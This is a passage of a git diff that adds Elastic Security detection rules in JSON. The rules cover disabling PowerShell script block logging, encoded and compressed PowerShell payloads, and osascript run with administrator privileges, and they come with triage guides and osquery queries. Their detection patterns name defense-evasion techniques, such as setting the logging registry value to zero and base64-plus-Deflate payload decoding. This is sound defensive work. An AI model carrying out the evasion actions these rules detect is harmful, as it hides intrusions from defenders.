used Elastic Defend to collect events.\n- If the selected Data View contains events that match the query in [this](https://github.com/elastic/integrations/blob/main/packages/lmd/kibana/ml_module/lmd-ml.json) configuration file, you will see a card for Lateral Movement Detection under \"Use preconfigured jobs\".\n- Keep the default settings and click \"Create jobs\" to start the anomaly detection jobs and datafeeds.\n", + "severity": "low", + "tags": [ + "Use Case: Lateral Movement Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Lateral Movement" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1210", + "name": "Exploitation of Remote Services", + "reference": "https://attack.mitre.org/techniques/T1210/" + } + ] + } + ], + "type": "machine_learning", + "version": 3 + }, + "id": "814d96c7-2068-42aa-ba8e-fe0ddd565e2e_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/818e23e6-2094-4f0e-8c01-22d30f3506c6_108.json b/packages/security_detection_engine/kibana/security_rule/818e23e6-2094-4f0e-8c01-22d30f3506c6_108.json new file mode 100644 index 00000000000..c8cdde4a0e5 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/818e23e6-2094-4f0e-8c01-22d30f3506c6_108.json @@ -0,0 +1,102 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to disable PowerShell Script Block Logging via registry modification. Attackers may disable this logging to conceal their activities in the host and evade detection.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "PowerShell Script Block Logging Disabled", + "note": "## Triage and analysis\n\n### Investigating PowerShell Script Block Logging Disabled\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks, making it available in various environments and creating an attractive way for attackers to execute code.\n\nPowerShell Script Block Logging is a feature of PowerShell that records the content of all script blocks that it processes, giving defenders visibility of PowerShell scripts and sequences of executed commands.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether it makes sense for the user to use PowerShell to complete tasks.\n- Investigate if PowerShell scripts were run after logging was disabled.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- PowerShell Suspicious Discovery Related Windows API Functions - 61ac3638-40a3-44b2-855a-985636ca985e\n- PowerShell Keylogging Script - bd2c86a0-8b61-4457-ab38-96943984e889\n- PowerShell Suspicious Script with Audio Capture Capabilities - 2f2f4939-0b34-40c2-a0a3-844eb7889f43\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell Suspicious Script with Screenshot Capabilities - 959a7353-1129-4aa7-9084-30746b256a70\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and event.type == \"change\" and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ScriptBlockLogging\\\\EnableScriptBlockLogging\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ScriptBlockLogging\\\\EnableScriptBlockLogging\"\n ) and registry.data.strings : (\"0\", \"0x00000000\")\n", + "references": [ + "https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.PowerShell::EnableScriptBlockLogging" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "818e23e6-2094-4f0e-8c01-22d30f3506c6", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.002", + "name": "Disable Windows Event Logging", + "reference": "https://attack.mitre.org/techniques/T1562/002/" + } + ] + }, + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "818e23e6-2094-4f0e-8c01-22d30f3506c6_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/818e23e6-2094-4f0e-8c01-22d30f3506c6_109.json b/packages/security_detection_engine/kibana/security_rule/818e23e6-2094-4f0e-8c01-22d30f3506c6_109.json new file mode 100644 index 00000000000..29d6fde274e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/818e23e6-2094-4f0e-8c01-22d30f3506c6_109.json @@ -0,0 +1,102 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to disable PowerShell Script Block Logging via registry modification. Attackers may disable this logging to conceal their activities in the host and evade detection.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.registry-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "PowerShell Script Block Logging Disabled", + "note": "## Triage and analysis\n\n### Investigating PowerShell Script Block Logging Disabled\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks, making it available in various environments and creating an attractive way for attackers to execute code.\n\nPowerShell Script Block Logging is a feature of PowerShell that records the content of all script blocks that it processes, giving defenders visibility of PowerShell scripts and sequences of executed commands.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether it makes sense for the user to use PowerShell to complete tasks.\n- Investigate if PowerShell scripts were run after logging was disabled.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- PowerShell Suspicious Discovery Related Windows API Functions - 61ac3638-40a3-44b2-855a-985636ca985e\n- PowerShell Keylogging Script - bd2c86a0-8b61-4457-ab38-96943984e889\n- PowerShell Suspicious Script with Audio Capture Capabilities - 2f2f4939-0b34-40c2-a0a3-844eb7889f43\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell Suspicious Script with Screenshot Capabilities - 959a7353-1129-4aa7-9084-30746b256a70\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and event.type == \"change\" and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ScriptBlockLogging\\\\EnableScriptBlockLogging\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ScriptBlockLogging\\\\EnableScriptBlockLogging\"\n ) and registry.data.strings : (\"0\", \"0x00000000\")\n", + "references": [ + "https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.PowerShell::EnableScriptBlockLogging" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "818e23e6-2094-4f0e-8c01-22d30f3506c6", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.002", + "name": "Disable Windows Event Logging", + "reference": "https://attack.mitre.org/techniques/T1562/002/" + } + ] + }, + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "818e23e6-2094-4f0e-8c01-22d30f3506c6_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/81fe9dc6-a2d7-4192-a2d8-eed98afc766a_111.json b/packages/security_detection_engine/kibana/security_rule/81fe9dc6-a2d7-4192-a2d8-eed98afc766a_111.json new file mode 100644 index 00000000000..51dbcb8825c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/81fe9dc6-a2d7-4192-a2d8-eed98afc766a_111.json @@ -0,0 +1,115 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the use of .NET functionality for decompression and base64 decoding combined in PowerShell scripts, which malware and security tools heavily use to deobfuscate payloads and load them directly in memory to bypass defenses.", + "false_positives": [ + "Legitimate PowerShell Scripts which makes use of compression and encoding." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell Suspicious Payload Encoded and Compressed", + "note": "## Triage and analysis\n\n### Investigating PowerShell Suspicious Payload Encoded and Compressed\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can embed compressed and encoded payloads in scripts to load directly into the memory without touching the disk. This strategy can circumvent string and file-based security protections.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately outside engineering or IT business units. As long as the analyst did not identify malware or suspicious activity related to the user or host, this alert can be dismissed.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n (\n \"System.IO.Compression.DeflateStream\" or\n \"System.IO.Compression.GzipStream\" or\n \"IO.Compression.DeflateStream\" or\n \"IO.Compression.GzipStream\"\n ) and\n FromBase64String\n ) and\n not file.path: ?\\:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Windows?Defender?Advanced?Threat?Protection\\\\\\\\Downloads\\\\\\\\* and\n not user.id : \"S-1-5-18\"\n", + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "81fe9dc6-a2d7-4192-a2d8-eed98afc766a", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: PowerShell Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1027", + "name": "Obfuscated Files or Information", + "reference": "https://attack.mitre.org/techniques/T1027/" + }, + { + "id": "T1140", + "name": "Deobfuscate/Decode Files or Information", + "reference": "https://attack.mitre.org/techniques/T1140/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 111 + }, + "id": "81fe9dc6-a2d7-4192-a2d8-eed98afc766a_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/81fe9dc6-a2d7-4192-a2d8-eed98afc766a_211.json b/packages/security_detection_engine/kibana/security_rule/81fe9dc6-a2d7-4192-a2d8-eed98afc766a_211.json new file mode 100644 index 00000000000..bbf9afe583e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/81fe9dc6-a2d7-4192-a2d8-eed98afc766a_211.json @@ -0,0 +1,125 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the use of .NET functionality for decompression and base64 decoding combined in PowerShell scripts, which malware and security tools heavily use to deobfuscate payloads and load them directly in memory to bypass defenses.", + "false_positives": [ + "Legitimate PowerShell Scripts which makes use of compression and encoding." + ], + "filters": [ + { + "meta": { + "negate": true + }, + "query": { + "wildcard": { + "file.path": { + "case_insensitive": true, + "value": "?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Protection\\\\Downloads\\\\*" + } + } + } + } + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell Suspicious Payload Encoded and Compressed", + "note": "## Triage and analysis\n\n### Investigating PowerShell Suspicious Payload Encoded and Compressed\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can embed compressed and encoded payloads in scripts to load directly into the memory without touching the disk. This strategy can circumvent string and file-based security protections.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately outside engineering or IT business units. As long as the analyst did not identify malware or suspicious activity related to the user or host, this alert can be dismissed.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n (\n \"System.IO.Compression.DeflateStream\" or\n \"System.IO.Compression.GzipStream\" or\n \"IO.Compression.DeflateStream\" or\n \"IO.Compression.GzipStream\"\n ) and\n FromBase64String\n ) and\n not user.id : \"S-1-5-18\"\n", + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "81fe9dc6-a2d7-4192-a2d8-eed98afc766a", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: PowerShell Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1027", + "name": "Obfuscated Files or Information", + "reference": "https://attack.mitre.org/techniques/T1027/" + }, + { + "id": "T1140", + "name": "Deobfuscate/Decode Files or Information", + "reference": "https://attack.mitre.org/techniques/T1140/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 211 + }, + "id": "81fe9dc6-a2d7-4192-a2d8-eed98afc766a_211", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/827f8d8f-4117-4ae4-b551-f56d54b9da6b_107.json b/packages/security_detection_engine/kibana/security_rule/827f8d8f-4117-4ae4-b551-f56d54b9da6b_107.json new file mode 100644 index 00000000000..87cf984afab --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/827f8d8f-4117-4ae4-b551-f56d54b9da6b_107.json @@ -0,0 +1,96 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies execution of the Apple script interpreter (osascript) without a password prompt and with administrator privileges.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Apple Scripting Execution with Administrator Privileges", + "query": "process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\") and process.name : \"osascript\" and\n process.command_line : \"osascript*with administrator privileges\"\n", + "references": [ + "https://discussions.apple.com/thread/2266150" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "827f8d8f-4117-4ae4-b551-f56d54b9da6b", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + 